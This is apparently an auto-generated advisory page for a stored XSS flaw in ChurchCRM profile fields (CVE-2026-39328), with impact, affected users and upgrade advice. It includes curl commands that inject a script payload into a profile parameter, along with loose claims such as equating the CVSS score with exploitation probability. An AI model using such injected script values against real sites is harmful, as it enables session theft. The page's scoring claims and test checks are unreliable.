7.1.1
A stored cross-site scripting (XSS) vulnerability exists in ChurchCRM versions 0.0.0 through 7.0. This flaw allows non-administrative users with EditSelf permission to inject malicious JavaScript into their Facebook, LinkedIn, and X profile fields. Exploitation results in session cookie exfiltration, potentially compromising administrator accounts and sensitive church data. The vulnerability is resolved in version 7.1.0.
The impact of this XSS vulnerability is significant due to the potential for session hijacking. An attacker can craft a malicious payload that, when viewed by other users (including administrators), executes JavaScript code. This code can then steal the victim's session cookies, granting the attacker unauthorized access to their account. Given ChurchCRM's function as a church management system, sensitive data such as member information, financial records, and internal communications could be at risk. The chaining of onfocus event handlers across multiple fields to bypass length restrictions demonstrates a degree of sophistication, suggesting a potential for targeted attacks.
This vulnerability was publicly disclosed on 2026-04-07. While no public proof-of-concept (PoC) has been released, the relatively straightforward nature of XSS vulnerabilities suggests that one could emerge. The CVSS score of 8.9 indicates a high probability of exploitation. It is not currently listed on the CISA KEV catalog.
Churches and religious organizations using ChurchCRM versions 0.0.0 through 7.0 are at risk. This includes organizations that rely on ChurchCRM for managing member data, donations, and other sensitive information. Shared hosting environments where multiple ChurchCRM instances reside on the same server could amplify the impact if one instance is compromised.
• php / web:
curl -I 'http://churchcrm/person.php?id=1&facebook=<script>alert(1)</script>' | grep -i content-type• generic web:
curl -s 'http://churchcrm/person.php?id=1&facebook=<script>alert(1)</script>' | grep alertdisclosure
エクスプロイト状況
EPSS
0.04% (12% パーセンタイル)
CISA SSVC
CVSS ベクトル
The primary mitigation is to upgrade ChurchCRM to version 7.1.0 or later, which contains the fix for this vulnerability. If upgrading immediately is not feasible, consider implementing temporary workarounds. Web application firewalls (WAFs) can be configured to filter out suspicious JavaScript payloads in profile fields. Input validation and output encoding on the server-side can also help prevent XSS attacks. Regularly review ChurchCRM configuration to ensure that EditSelf permissions are granted only to authorized users. After upgrading, confirm the vulnerability is resolved by attempting to inject a simple JavaScript payload into a profile field and verifying that it does not execute.
Actualice ChurchCRM a la versión 7.1.0 o posterior para mitigar la vulnerabilidad de XSS. Esta actualización corrige el problema al sanear correctamente las entradas de los usuarios en los campos del perfil social, evitando la inyección de código malicioso.
脆弱性分析と重要アラートをメールでお届けします。
CVE-2026-39328 is a stored cross-site scripting vulnerability affecting ChurchCRM versions 0.0.0 through 7.0, allowing attackers to inject malicious JavaScript into user profiles.
If you are using ChurchCRM versions 0.0.0 through 7.0, you are potentially affected by this vulnerability. Upgrade to version 7.1.0 or later to mitigate the risk.
The recommended fix is to upgrade ChurchCRM to version 7.1.0 or later. Consider WAF rules and input validation as temporary workarounds if immediate upgrade is not possible.
While no active exploitation has been confirmed, the vulnerability's severity and ease of exploitation suggest a potential for future attacks.
Refer to the ChurchCRM website and security advisories for the latest information and updates regarding CVE-2026-39328.
依存関係ファイルをアップロードすれば、このCVEや他のCVEがあなたに影響するか即座にわかります。